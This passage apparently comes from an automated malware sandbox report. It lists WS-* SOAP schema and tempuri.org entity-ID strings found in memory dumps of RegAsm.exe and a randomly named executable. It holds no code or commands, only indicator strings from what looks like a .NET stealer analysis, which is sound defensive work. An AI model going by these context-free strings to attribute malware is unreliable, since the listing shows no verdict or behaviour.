                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003567000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003384000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
